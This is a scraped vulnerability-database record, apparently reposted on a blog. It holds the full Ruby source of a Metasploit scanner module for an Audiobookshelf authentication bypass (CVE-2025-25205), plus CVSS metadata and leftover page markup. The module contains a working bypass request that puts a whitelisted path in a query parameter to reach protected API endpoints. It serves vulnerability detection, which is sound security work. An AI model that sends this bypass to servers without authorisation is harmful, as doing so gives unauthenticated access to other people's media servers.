{“lastseen”:”2026-06-23T19:36:56″,”description”:”This module detects Audiobookshelf servers affected by CVE-2025-25205, an unauthenticated authentication bypass. Affected versions 2.17.0 through 2.19.0 decide whether a GET request may skip authentication by testing an unanchored regular expression…”,”published”:”2026-06-23T19:06:59″,”modified”:”2026-06-23T19:06:59″,”type”:”metasploit”,”title”:”Audiobookshelf Unauthenticated API Authentication Bypass Scanner”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-SCANNER-HTTP-AUDIOBOOKSHELF_AUTH_BYPASS-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-25205″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n\\n # Affected range per the advisory: 2.17.0 \\u003c= version \\u003c= 2.19.0 (patched in 2.19.1).\\n VULNERABLE_MIN = Rex::Version.new(‘2.17.0’)\\n PATCHED_VERSION = Rex::Version.new(‘2.19.1’)\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Audiobookshelf Unauthenticated API Authentication Bypass Scanner’,\\n ‘Description’ =\\u003e %q{\\n This module detects Audiobookshelf servers affected by CVE-2025-25205, an\\n unauthenticated authentication bypass. Affected versions (2.17.0 through\\n 2.19.0) decide whether a GET request may skip authentication by testing an\\n unanchored regular expression against the request’s full original URL,\\n including the query string, rather than the normalized path. By appending a\\n query parameter whose value contains a whitelisted substring such as\\n \/api\/items\/1\/cover, an unauthenticated client reaches protected API\\n endpoints.\\n\\n The module fingerprints the server and version through the unauthenticated\\n \/status endpoint, then sends two requests to the protected \/api\/libraries\\n endpoint: a baseline request that must be rejected with HTTP 401, and a\\n bypass request carrying the whitelisted substring in its query string. On a\\n vulnerable server the bypass request is processed instead of rejected, which\\n this module treats as confirmation. It deliberately avoids endpoints such as\\n \/api\/users that crash the server process (the denial-of-service half of this\\n CVE).\\n },\\n ‘Author’ =\\u003e [\\n ‘swiftbird07’, # vulnerability discovery and advisory\\n ‘Kenneth LaCroix’ # Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-25205’],\\n [‘GHSA’, ‘pg8v-5jcv-wrvw’],\\n [‘URL’, ‘https:\/\/github.com\/advplyr\/audiobookshelf\/commit\/ec6537656925a43871b07cfee12c9f383844d224’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-02-12’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n },\\n ‘DefaultOptions’ =\\u003e { ‘RPORT’ =\\u003e 13_378, ‘SSL’ =\\u003e false }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘The base path to Audiobookshelf’, ‘\/’])\\n ]\\n )\\n end\\n\\n # Fingerprint the target via the unauthenticated \/status endpoint.\\n # Returns the reported server version string, or nil if this does not look\\n # like an Audiobookshelf instance.\\n def fingerprint_version\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘status’)\\n )\\n return nil unless res \\u0026\\u0026 res.code == 200\\n\\n json = res.get_json_document\\n return nil unless json.is_a?(Hash) \\u0026\\u0026 json[‘app’].to_s.casecmp?(‘audiobookshelf’)\\n\\n json[‘serverVersion’]\\n end\\n\\n # Differential auth-bypass check against the protected \/api\/libraries endpoint:\\n # a baseline request must be rejected with HTTP 401, while the bypass request\\n # (carrying a whitelisted substring in its query) is processed instead of\\n # rejected. On a vulnerable server the bypass request reaches the handler, which\\n # returns 200 or 500 (the handler dereferences the now-undefined user); a patched\\n # server returns 401 to both.\\n def auth_bypassed?\\n baseline = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘libraries’)\\n )\\n return false unless baseline \\u0026\\u0026 baseline.code == 401\\n\\n bypass = send_request_cgi(\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘libraries’),\\n ‘vars_get’ =\\u003e { ‘r’ =\\u003e ‘\/api\/items\/1\/cover’ }\\n )\\n return false unless bypass\\n\\n bypass.code == 200 || bypass.code == 500\\n end\\n\\n def check_host(_ip)\\n version = fingerprint_version\\n return Exploit::CheckCode::Unknown(‘Target does not appear to be Audiobookshelf’) if version.nil?\\n\\n return Exploit::CheckCode::Vulnerable(\\”Audiobookshelf #{version} – authentication bypass confirmed\\”) if auth_bypassed?\\n\\n begin\\n parsed = Rex::Version.new(version)\\n if parsed \\u003e= VULNERABLE_MIN \\u0026\\u0026 parsed \\u003c PATCHED_VERSION\\n return Exploit::CheckCode::Appears(\\”Audiobookshelf #{version} is in the affected range but the bypass was not confirmed\\”)\\n end\\n rescue ArgumentError\\n # Unparsable version string; fall through to Safe with the raw value.\\n end\\n\\n Exploit::CheckCode::Safe(\\”Audiobookshelf #{version} – bypass not confirmed\\”)\\n end\\n\\n def run_host(_ip)\\n version = fingerprint_version\\n unless version\\n vprint_status(\\”#{peer} – Target does not appear to be Audiobookshelf\\”)\\n return\\n end\\n vprint_status(\\”#{peer} – Audiobookshelf #{version} detected\\”)\\n\\n unless auth_bypassed?\\n print_status(\\”#{peer} – Audiobookshelf #{version} – not vulnerable (authentication enforced)\\”)\\n return\\n end\\n\\n print_good(\\”#{peer} – Audiobookshelf #{version} – unauthenticated API authentication bypass confirmed (CVE-2025-25205)\\”)\\n report_vuln(\\n host: rhost,\\n port: rport,\\n name: name,\\n info: \\”Audiobookshelf #{version} unauthenticated API authentication bypass\\”,\\n refs: references\\n )\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/scanner\/http\/audiobookshelf_auth_bypass.rb”,”cvss”:{“score”:8.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/audiobookshelf_auth_bypass\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-23T19:36:56″,”description”:”This module detects Audiobookshelf servers affected by CVE-2025-25205, an unauthenticated authentication bypass. Affected versions 2.17.0 through 2.19.0 decide whether a GET request may skip authentication…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,77,12,15,169,13,7,11,5],"class_list":["post-65232","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-82","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n